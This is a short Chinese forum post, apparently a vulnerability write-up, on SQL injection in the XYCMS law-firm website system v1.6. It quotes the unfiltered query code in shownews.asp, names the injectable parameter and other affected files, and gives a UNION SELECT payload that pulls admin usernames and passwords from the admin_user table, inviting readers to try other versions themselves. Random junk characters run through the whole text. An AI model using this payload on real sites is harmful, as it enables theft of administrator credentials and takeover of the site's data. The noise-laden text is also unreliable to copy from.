前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
& b% Z9 s, T: e) \
- b$ @& C2 X# @, Y( B+ g3 R# i淫荡分割线6 N O2 P& `+ I% {9 @, w! R
--------------------------------------------------------
" N* q6 I, ~: p" w) P( g 7 s5 r# F0 d9 |3 B. S( p/ I- O" S
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
7 u9 [8 g Y7 |4 V! M# o源码地址:http://down.chinaz.com/soft/29233.htm
% H# t& x2 z" S# | ' N% j6 q5 X. G* a
漏洞文件:shownews.asp% d: H9 F, [. C6 S6 f
漏洞代码:7-13行
8 Q" K M k! {) H+ r 8 c- c) Q! q1 X2 n8 V; C2 w) c8 _
/ r# ]/ f6 a2 U# I$ K
<% . I/ q# i0 }: U4 j) ^6 Z
id=request.QueryString("id")
! \0 L; {% `: U; _ f % A& m" s+ ^8 U5 C# D; j
set snews=server.createobject("adodb.recordset")
+ S6 Y/ J" x _2 ^6 u4 r4 qexec="select * from [news] where id="&id
4 Y4 H: q* v, b" V& Hsnews.open exec,conn,1,14 w P; o. N$ p+ |* Z
%>5 j6 k+ {% V4 r6 `1 m* ]! \
0 v4 k* }1 r6 s2 L
' y3 \/ Z8 {3 w1 N- N" r什么过滤都没有 直造成注入4 ], k6 ^7 {+ n8 ~6 \
|; _/ T3 W+ e2 R
注入点:http://127.0.0.1:99/shownews.asp?id=xx" i% o, E( I2 ?2 Y! f# H
( ]0 W7 A9 r; J, k% S( X2 o! S; ^其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找: N9 Y% E9 V% d |! ?* X
8 r) M, c0 K- J
8 t$ z% U" z" @7 \2 z4 u3 a* ^exp: union select 1,admin,password,4,5,7 from admin_user7 ?! c! t. i7 X, D M+ u
% t8 i! u; T+ }- S# D0 F. x |